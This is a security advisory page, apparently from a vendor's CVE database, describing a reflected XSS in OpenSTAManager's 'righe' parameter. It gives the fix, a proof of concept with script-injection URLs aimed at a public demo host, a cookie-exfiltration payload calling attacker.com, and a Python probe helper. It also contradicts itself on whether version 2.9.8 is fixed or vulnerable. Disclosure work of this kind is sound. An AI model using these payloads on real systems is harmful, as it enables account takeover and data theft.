CVE-2026-24415

CVE-2026-24415 is a medium-severity cross-site scripting (XSS) vulnerability in devcode-it/openstamanager (composer), affecting versions < 2.9.8. It is fixed in 2.9.8.

Summary

Multiple reflected cross-site scripting (XSS) vulnerabilities in OpenSTAManager v2.9.8 allow an attacker, who needs no account of their own, to execute arbitrary JavaScript in the browser of an authenticated user who opens a crafted URL, potentially leading to session hijacking, credential theft, and unauthorized actions performed as that user.

Vulnerable Parameter: righe (GET)

Details

OpenSTAManager v2.9.8 contains multiple reflected XSS vulnerabilities in the modifica_iva.php modals of the contract, quote, invoice, delivery-note (DDT), order and intervention modules. The application does not HTML-encode the user-supplied righe GET parameter before reflecting it into an HTML attribute value.

Vulnerable Code Location:
File: /modules/contratti/modals/modifica_iva.php (Line 125)

<input type="hidden" name="righe" value="<?php echo $_GET['righe']; ?>">

The $_GET['righe'] parameter is echoed directly into the value attribute without htmlspecialchars() or an equivalent encoding function. A double quote in the parameter closes the attribute, so an attacker can break out of the attribute context and inject arbitrary HTML/JavaScript.

All Affected Files:

  1. /modules/contratti/modals/modifica_iva.php - Line 125, Line 167
  2. /modules/preventivi/modals/modifica_iva.php - Line 125, Line 167
  3. /modules/fatture/modals/modifica_iva.php - Line 121, Line 161
  4. /modules/ddt/modals/modifica_iva.php - Line 125, Line 167
  5. /modules/ordini/modals/modifica_iva.php - Line 125, Line 167
  6. /modules/interventi/modals/modifica_iva.php - Line 125, Line 167

PoC

Prerequisites:

  • Running instance of OpenSTAManager v2.9.8
  • Valid admin credentials (username: admin, password: admin for test instance)

Step 1: Login

curl -c cookies.txt -X POST 'http://localhost:8081/index.php?op=login' \
  -d 'username=admin&password=admin'

Step 2: Trigger XSS
Open the following URL in the authenticated browser session (or fetch it with curl -b cookies.txt and inspect the response body for the unescaped payload):

http://localhost:8081/modules/contratti/modals/modifica_iva.php?righe="><script>alert(document.domain)</script>

Tested URLs (All vulnerable):

  • https://demo.osmbusiness.it/modules/contratti/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>
  • https://demo.osmbusiness.it/modules/preventivi/modals/modifica_iva.php?righe=1"><script>alert(document.cookie)</script>
  • https://demo.osmbusiness.it/modules/fatture/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>
  • https://demo.osmbusiness.it/modules/ddt/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>
  • https://demo.osmbusiness.it/modules/ordini/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>
  • https://demo.osmbusiness.it/modules/interventi/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>

Expected Result:
A JavaScript alert displays document.cookie (only cookies not flagged HttpOnly are readable from script), confirming that the injected script executes in the application's origin.

HTML Output (verified on live instance):

<input type="hidden" name="righe" value=""><script>alert(document.cookie)</script>">

Alternative Payloads:
Session stealing: "><script>fetch('https://attacker.com/?c='+document.cookie)</script>
(This exfiltrates only cookies readable from script; an HttpOnly session cookie is not included, although script running in the origin can still read page content and issue requests as the user.)

Impact

Affected Users: All authenticated users who can open the contracts, quotes, invoices, delivery notes (DDT), orders, or interventions modules.

Attack Scenario:

  1. Attacker crafts malicious URL with XSS payload
  2. Attacker sends URL to victim via email/chat/phishing
  3. Victim (authenticated user) clicks the link
  4. Malicious JavaScript executes in victim's browser context
  5. Attacker can:
    • Steal session cookies (when not flagged HttpOnly) → Full account takeover
    • Perform actions on behalf of victim (create/modify/delete records)
    • Steal CSRF tokens and bypass CSRF protection
    • Redirect to phishing page
    • Inject keylogger to capture sensitive data
    • Modify page content to trick user into revealing credentials

Recommended Fix:

<input type="hidden" name="righe" value="<?php echo htmlspecialchars($_GET['righe'], ENT_QUOTES, 'UTF-8'); ?>">

Apply the same encoding at both reflection points listed for each affected file in the Details section.
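The following Python script is added here as an editorial example; it is not part of OpenSTAManager or the original report. It ties together the PoC above and the recommended fix: it renders the hidden input both as the vulnerable template line does and as the htmlspecialchars() fix does (Python's html.escape(quote=True) encodes the same characters as ENT_QUOTES, except that it emits &#x27; rather than &#039; for a single quote), builds the probe URL for each of the six affected modals, and classifies a response body as reflecting a canary raw, entity-encoded, or not at all. The base URL, the canary string and the sample response bodies are assumptions constructed for the example; to check a real instance, request the probe URLs with the cookie jar from Step 1 and pass each response body to classify_reflection().

```python
"""Offline helper for CVE-2026-24415: render, probe and classify the ``righe`` reflection.

Added example, not OpenSTAManager code. Sample inputs below are constructed.
"""
import html
from urllib.parse import urlencode, urljoin

# Modules whose modals/modifica_iva.php reflect $_GET['righe'] (from the advisory's file list).
AFFECTED_MODULES = ("contratti", "preventivi", "fatture", "ddt", "ordini", "interventi")

# Canary that closes a double-quoted attribute and opens a tag; the tag name is
# arbitrary so it cannot be confused with markup the application emits itself.
CANARY = '"><xss-canary-7f3a>'


def probe_urls(base_url, payload=CANARY):
    """One probe URL per affected modal. base_url is an assumption (e.g. http://localhost:8081/)."""
    return [
        urljoin(base_url, f"modules/{module}/modals/modifica_iva.php")
        + "?"
        + urlencode({"righe": payload})
        for module in AFFECTED_MODULES
    ]


def render_hidden_input(righe, hardened):
    """Python equivalent of the template line at both reflection points.

    hardened=False mirrors  <?php echo $_GET['righe']; ?>
    hardened=True  mirrors  htmlspecialchars($_GET['righe'], ENT_QUOTES, 'UTF-8')
    """
    value = html.escape(righe, quote=True) if hardened else righe
    return f'<input type="hidden" name="righe" value="{value}">'


def classify_reflection(body, payload=CANARY):
    """Classify how a response body reflects the probe payload.

    Returns 'vulnerable' if the payload appears verbatim (attribute break-out
    possible), 'escaped' if only its entity-encoded form appears, and 'absent'
    otherwise (e.g. a redirect to the login page because the session expired).
    A verbatim hit inside a <textarea> or an HTML comment would also be reported
    as 'vulnerable', so confirm in a browser before filing.
    """
    if payload in body:
        return "vulnerable"
    if html.escape(payload, quote=True) in body:
        return "escaped"
    return "absent"


def demo():
    """Constructed before/after bodies, so the script runs without a live instance."""
    payload = '"><script>alert(document.cookie)</script>'
    vulnerable_body = "<form>\n" + render_hidden_input(payload, hardened=False) + "\n</form>"
    fixed_body = "<form>\n" + render_hidden_input(payload, hardened=True) + "\n</form>"
    return {
        "vulnerable": classify_reflection(vulnerable_body, payload),
        "fixed": classify_reflection(fixed_body, payload),
        "login_page": classify_reflection("<html><body>Login</body></html>", payload),
    }


if __name__ == "__main__":
    for url in probe_urls("http://localhost:8081/"):
        print(url)
    for name, verdict in demo().items():
        print(f"{name}: {verdict}")
```

The canary deliberately avoids `<script>` so that a web application firewall in front of the instance does not mask the result; a raw reflection of `"><xss-canary-7f3a>` proves the attribute break-out regardless of what payload an attacker would substitute.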

Untrusted input is rendered as active markup in a victim's browser, which can run script in their session. Typical impact: session or credential theft, and actions taken as the user.

Affected versions

devcode-it/openstamanager (< 2.9.8)

Security releases

devcode-it/openstamanager → 2.9.8 (composer)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.


Remediation advice

Upgrade devcode-it/openstamanager to 2.9.8 or later to resolve this vulnerability.

Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.

Frequently Asked Questions

  1. What is CVE-2026-24415? CVE-2026-24415 is a medium-severity cross-site scripting (XSS) vulnerability in devcode-it/openstamanager (composer), affecting versions < 2.9.8. It is fixed in 2.9.8. Untrusted input is rendered as active markup in a victim's browser, which can run script in their session.
  2. Which versions of devcode-it/openstamanager are affected by CVE-2026-24415? devcode-it/openstamanager (composer) versions < 2.9.8 are affected.
  3. Is there a fix for CVE-2026-24415? Yes. CVE-2026-24415 is fixed in 2.9.8. Upgrade to this version or later.
  4. Is CVE-2026-24415 exploitable, and should I be worried? Whether CVE-2026-24415 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk.
  5. What actually determines whether CVE-2026-24415 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  6. How do I fix CVE-2026-24415? Upgrade devcode-it/openstamanager to 2.9.8 or later.

